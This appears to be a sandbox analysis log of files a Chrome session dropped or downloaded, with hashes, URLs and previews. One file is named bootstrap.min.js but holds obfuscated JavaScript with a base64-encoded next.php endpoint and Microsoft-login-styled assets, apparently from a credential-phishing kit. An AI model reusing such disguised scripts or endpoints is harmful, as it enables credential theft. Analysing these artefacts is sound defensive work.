                                                                                                                  Preview:L..................F.@.. ...$+.,....zjP.$..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IVY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VVY.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VVY.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VVY.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VVY.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 22 13:08:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2677
                                                                                                                  Entropy (8bit):3.990105581599411
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8ydDTrbjHmZidAKZdA1dehBiZUk1W1qeh0My+C:8Sjl9UMy
                                                                                                                  MD5:E8B0003923BC7CEDD31F623D1CAF6DB1
                                                                                                                  SHA1:2C435F0D57160DFB63D7662B80C9DECF3A630722
                                                                                                                  SHA-256:A9BF1F490BC96501429EA1C550943D60E0D26DA5FE16CA5397E8BEA4FEEF9D62
                                                                                                                  SHA-512:A96CFA2337B8E479ABBDBB1868635CBDDB30EAB2FDFED12D9286ECCFEFC353BF9AEEA137B66AC4662B0F030E0028A878A719B8009EAB87BCA3C144830DC0868D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,.....__.$..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IVY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VVY.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VVY.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VVY.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VVY.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 22 13:08:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2679
                                                                                                                  Entropy (8bit):4.0016052144714935
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:8jdDTrbjHmZidAKZdA1duTeehOuTbbiZUk5OjqehOuTbqMy+yT+:8RjNTfTbxWOvTbqMy7T
                                                                                                                  MD5:90E6AFE97D4921FA031A20AFAF992967
                                                                                                                  SHA1:40F1AEF61D757413FF3E0CF028E41610F12B4B4C
                                                                                                                  SHA-256:51D01E70AEFE882B513ECB5D7138C0DD8F86216B2E05D50DE31C5946A31890A1
                                                                                                                  SHA-512:4A1036A65AC640767F9CF43FDF7AC8EA964463511D8D84204FC087409269196B82DB41C9F00A7260169CE39C7A52B051A1006CF62599B77AA422221BF42D7723
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:L..................F.@.. ...$+.,....R.@.$..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IVY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VVY.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VVY.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VVY.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VVY.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (47531)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):47532
                                                                                                                  Entropy (8bit):5.399631966931825
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:khCcfnNm52VJHkmnX7knsQMcvjdMdSzCTLos4P8X60Yo6VA3H1KCZ2EHCb+I29Na:kbNm8JHnnX7ksG7CT0K6V4P8
                                                                                                                  MD5:808A57CAE0B6FEE71F46EFDDED44B348
                                                                                                                  SHA1:DD570A24C8BDA1B391AA1DDEA6004125818E579A
                                                                                                                  SHA-256:5B75AC6F98994352699841DFFA6E562725EBBD0005C539946AD3625EC550EB0F
                                                                                                                  SHA-512:3F06DFBFDEDE9BB4270EB1BBBE29FFBDB6E19DC0AA8234E1A2B92D84F0737555031231965151EFC386510193343985BCEC63062484BBD8EC0540A94A0109B765
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(f){Wt(l,o,c,h,p,"next",f)}function p(f){Wt(l,o,c,h,p,"throw",f)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):196
                                                                                                                  Entropy (8bit):5.098952451791238
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
                                                                                                                  MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                                                                                                  SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                                                                                                  SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                                                                                                  SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://apeidieppe-d.basiic.net/favicon.ico
                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):315
                                                                                                                  Entropy (8bit):5.0572271090563765
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://5102487645.my.id/favicon.ico
                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):3.990210155325004
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (19015)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):19188
                                                                                                                  Entropy (8bit):5.212814407014048
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):17174
                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (48664)
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):48944
                                                                                                                  Entropy (8bit):5.272507874206726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (65474), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):553296
                                                                                                                  Entropy (8bit):4.912043601657718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:gTWsY1akh5JWPJurgWLNW6VF7YlNbx1eX8jumoHL4owSKrthO4bQVw:zay8oLLc6VF7eNyMjumoHL4owSKrcw
                                                                                                                  MD5:34612323AF677D49270E6ACCC3887F01
                                                                                                                  SHA1:DBAEA3E8379967AE377DFB6C0FDA699053AB4BC2
                                                                                                                  SHA-256:321C04018CC260D14F57CE649C9853ED645586365FFC05A312F9316D352275A8
                                                                                                                  SHA-512:FFD8937B5F380B401B5C6E0CABC3A2C602B92153DCD120F41EA1E3DECBBB5D959DD303D1776C45E7E9B1094CFA8CCB85EEAEC2B9AF3493FA0028F5754294EBD0
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:var file = "aHR0cHM6Ly81MTAyNDg3NjQ1Lm15LmlkL25leHQucGhw";....var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','>&nbsp<spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','\x20.border-i','top:\x2020px
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:PNG image data, 2 x 69, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61
                                                                                                                  Entropy (8bit):3.969798475032602
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:yionv//thPltOdmshkxl/k4E08up:6v/lhP2dFk7Tp
                                                                                                                  MD5:F2C2E5EE85A8FDF3C45A6F037BD855D7
                                                                                                                  SHA1:88B27332F5F4539C148ECED81040B72E5BDC3A74
                                                                                                                  SHA-256:86952B5EDB7DD57577B9D745296148AFD076665E8BE6F05BF2C2BE8CAE8F08E3
                                                                                                                  SHA-512:23ED9F48734EE5939A549DD34C521CE4EF8B74C47A6DFF5AE20ECADE250499568896C6E6101EDD3D3C19E2CD2F92481186CBB54086E31CAFE73A5E2A672C854C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:.PNG........IHDR.......E...........IDAT.....$.....IEND.B`.
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):112587
                                                                                                                  Entropy (8bit):5.242047368139822
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:oKYa/h4hgML6//Ske04S2n/TzPfq8QcvB:oKYapzML6//SH04S2/vPfqB4B
                                                                                                                  MD5:E8AC6F1466B45E6DD2EAB6CC575B8630
                                                                                                                  SHA1:F83D7FD80EA153DA492481D22374F3B444C1CB0E
                                                                                                                  SHA-256:123A94D93C21EA6182E5F8FDE949F5DDAB2B51579DF77B335C9C22AFA270A209
                                                                                                                  SHA-512:78B97EE3E02FDBCE8CA28E817A40675F87EED0493D10D5BAA2D6614FBD308D008DDCD79D856EC927179EEFAC05DB6A2B2B41477A611F651E6EC53F5882C05F03
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js.map
                                                                                                                  Preview:{"version":3,"file":"popper.min.js","sources":["../../src/utils/isFunction.js","../../src/utils/getStyleComputedProperty.js","../../src/utils/getParentNode.js","../../src/utils/getScrollParent.js","../../src/utils/getOffsetParent.js","../../src/utils/isOffsetContainer.js","../../src/utils/getRoot.js","../../src/utils/findCommonOffsetParent.js","../../src/utils/getScroll.js","../../src/utils/includeScroll.js","../../src/utils/getBordersSize.js","../../src/utils/getWindowSizes.js","../../src/utils/getClientRect.js","../../src/utils/getBoundingClientRect.js","../../src/utils/getOffsetRectRelativeToArbitraryNode.js","../../src/utils/getViewportOffsetRectRelativeToArtbitraryNode.js","../../src/utils/isFixed.js","../../src/utils/getBoundaries.js","../../src/utils/computeAutoPlacement.js","../../src/utils/getReferenceOffsets.js","../../src/utils/getOuterSizes.js","../../src/utils/getOppositePlacement.js","../../src/utils/getPopperOffsets.js","../../src/utils/find.js","../../src/utils/findInde
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1864
                                                                                                                  Entropy (8bit):5.222032823730197
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):32
                                                                                                                  Entropy (8bit):4.390319531114783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HYmpBth0tYY:4mpbgYY
                                                                                                                  MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                                                                  SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                                                                  SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                                                                  SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAme7sM8y5TbghIFDa0JrrESEAkydyftoP4q7BIFDUPzdjk=?alt=proto
                                                                                                                  Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:ASCII text, with very long lines (65474), with CRLF line terminators
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):553296
                                                                                                                  Entropy (8bit):4.912043601657718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:gTWsY1akh5JWPJurgWLNW6VF7YlNbx1eX8jumoHL4owSKrthO4bQVw:zay8oLLc6VF7eNyMjumoHL4owSKrcw
                                                                                                                  MD5:34612323AF677D49270E6ACCC3887F01
                                                                                                                  SHA1:DBAEA3E8379967AE377DFB6C0FDA699053AB4BC2
                                                                                                                  SHA-256:321C04018CC260D14F57CE649C9853ED645586365FFC05A312F9316D352275A8
                                                                                                                  SHA-512:FFD8937B5F380B401B5C6E0CABC3A2C602B92153DCD120F41EA1E3DECBBB5D959DD303D1776C45E7E9B1094CFA8CCB85EEAEC2B9AF3493FA0028F5754294EBD0
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  URL:https://5102487645-1323985617.cos.eu-frankfurt.myqcloud.com/bootstrap.min.js
                                                                                                                  Preview:var file = "aHR0cHM6Ly81MTAyNDg3NjQ1Lm15LmlkL25leHQucGhw";....var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','>&nbsp<spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','\x20.border-i','top:\x2020px
                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):161998
                                                                                                                  Entropy (8bit):5.277489472617139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:6RS2O4rIswFZqYxVHux3SifFNivt18d85ihM9tvhQGna/dVXrLbDXg7xLIS:959zzxYjt0kd855naPXr3q
                                                                                                                  MD5:331C9BAC5363B904CEB0955E418EE135
